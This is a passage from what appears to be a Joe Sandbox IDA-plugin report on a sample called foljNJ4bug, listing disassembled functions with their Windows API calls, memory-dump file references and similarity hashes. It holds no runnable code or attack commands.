                                                                                                                                              • API String ID: 2808897238-0
                                                                                                                                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                                                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                                                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                                                              • __itow.LIBCMT ref: 004699CD
                                                                                                                                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                                                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                                                              • __itow.LIBCMT ref: 00469A97
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$__itow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3379773720-0
                                                                                                                                              • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                              • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                                                              • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                                                              • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                                                              APIs
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3880355969-0
                                                                                                                                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                                                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                                                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2782032738-0
                                                                                                                                              • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                              • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                                              • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                                                                              • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                                              APIs
                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                                                              • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                                                              • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1352109105-0
                                                                                                                                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                                                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                                                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                                                              APIs
                                                                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3321077145-0
                                                                                                                                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                                                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                                                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                                                              APIs
                                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                                                              • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                                                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                                                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3058430110-0
                                                                                                                                              • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                              • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                                                              • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                                                              • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                                                              APIs
                                                                                                                                              • GetParent.USER32(?), ref: 004503C8
                                                                                                                                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                                                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                                                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Proc$Parent
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2351499541-0
                                                                                                                                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                                                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                                                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                                                              APIs
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                                                              • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1795658109-0
                                                                                                                                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                                                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                                                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                                                              APIs
                                                                                                                                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                              • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                                                              • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2759813231-0
                                                                                                                                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                                                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                                                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                              • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                                                              • _wcslen.LIBCMT ref: 00449519
                                                                                                                                              • _wcslen.LIBCMT ref: 00449526
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2886238975-0
                                                                                                                                              • Opcode ID: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                              • Instruction ID: 7d4d19c59aaf55394df3596c947b25f6969e765268ec3300c5285dc4bbf20b28
                                                                                                                                              • Opcode Fuzzy Hash: cda1f7e16000b3d6f1552df2769fac91363fb93f1f54a3f578086acf89ecf69d
                                                                                                                                              • Instruction Fuzzy Hash: F7213A76B00208A6E730DF55ED81BEFB368EBA0310F10416FFF0896240E6794D55C799
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __setmode$DebugOutputString_fprintf
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1792727568-0
                                                                                                                                              • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                              • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                                                              • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                                                              • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$Long$AttributesLayered
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2169480361-0
                                                                                                                                              • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                              • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                                                              • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                                                              • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                                                                • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                                                                • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                                                              • String ID: cdecl
                                                                                                                                              • API String ID: 3850814276-3896280584
                                                                                                                                              • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                                              • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                                                              • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                                                              • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                                                              • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
